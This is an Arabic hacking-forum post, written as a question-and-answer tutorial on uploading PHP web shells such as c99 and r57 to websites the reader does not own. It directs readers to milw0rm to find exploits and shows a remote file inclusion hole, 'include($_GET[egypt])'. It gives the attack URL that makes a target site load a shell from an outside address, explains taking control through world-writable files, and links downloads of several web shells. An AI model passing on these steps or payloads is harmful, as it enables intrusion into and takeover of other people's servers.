السلام عليكم ورحمة الله وبركاته
انا اخوكم مالك من سلطنة عمان الملقب با تدمير هكر:/
حبيت اعمل شرح لا اصعب شي واجهني في الهكر.. وهو الشل وكيفية رفعه!
حيث اني توقفت و الى الان ان متوقف بسبب هذه المشكله..وهي انا نزلت الشلc99 على جهازي بعد ذالك ماذا افعل؟
اتمنى الرد على السؤال وشكرا
.(.(.(.(..).).).).).).).
الان ناتي للمووضوع....’’’
بسم الله نبدأ
س1 ما هو الشل؟
الشل هو سكربت بصيغة php يقوم بتطبيق اوامر علي السيرفر الي احنا رافعينو عليه من خلال ثغرة ما و يعرض لنا محتويات الموقع من ملفات و مجلدات و ممكن حتى ملفات و مجلدات
جميع المواقع على السيرفر و كما سبق الدكر ان الشيل يسمح لنا بتطبيق اوامر على السيرفر فهدا يلخص كل شيء فنعني بالاوامر تعديل الملفات قراءتها و غيرها
س2ما هي افضل الشلات؟
اكثر الشلات استخداما هم c99 , r57 , sniper
وانا في رأيي افضلهم هو c99
س3 ما الاختلاف بينهم؟
قد يكون الاختلاف في واجهة الشل او في ميزة يتميز بها شل عن اخر
س4 كيف يتم رفع الشل؟
هذا هو الجزء الاصعب
فلكي ترفع الشل يجب ان يكون هناك ثغرة ما في ملف من ملفات الموقع حتي يتسني لك رفع الشل
فمثلا ملف index في موقع ما به ثغرة اذن يمكننا رفع الشل
س5 كيف اجد الثغرة؟
1- ادخل الي موقع http://milw0rm.com
2-اصغط علي كلمة search
3-اكتب اسم السكربت
4- هيجيلك كل الثغرات الموجودة اختار منهم واحدة
س6 وكيف استطيع استغلال الثغرة؟
انت بعد ما تلاقي مثلا في الموقع المستهدف سكربت Article Directory
هذا السكربت به ثغرة في ملف index.php
والكود المسبب للثغرة هو
كود PHP:
<?php include($_GET[egypt]); ?>
علشان نستغل الثغرة دي هنكتب في المتصفح الكلام ده
http://www.xxxx.com/index.php?egypt=VVV.txt
xxxx =رابط الموقع المستهدف
vvvv=رابط الشل الي هترفعو (متنساش تكتب بعديه علامة استفهام)
س7 بعد ما ارفع الشل اعمل ايه؟
دلوقت انت تقدر تتحكم بالموقع بس بشرط لازم يكون في الموقع ملف بتصريح 777 عشان تقدر تعمل الي انت عاوزة ولو مفيش يبقي هارد لك
س8 الشل مش راصي يترفع اعمل ايه؟
الموقع ممكن يكون الثغرة دي مترقعة عنده عشان كده مش هتعرف تخش ولازم تعرف ان الثغرة تنفع في موقع وعشرة لا يعني متضايقش اوي لو انت مش عارف تخترق الموقع .
والان بعض الشلات هدية مني
c99
http://no-hack.net/shells/c99.txt
r57
http://no-hack.net/shells/r57.txt
sniper
http://no-hack.net/shells/sniper.txt
mohajer
http://no-hack.net/shells/mohajer.txt
....
ل الامانه (بعضض)الموضوع منقوول
وشكرا
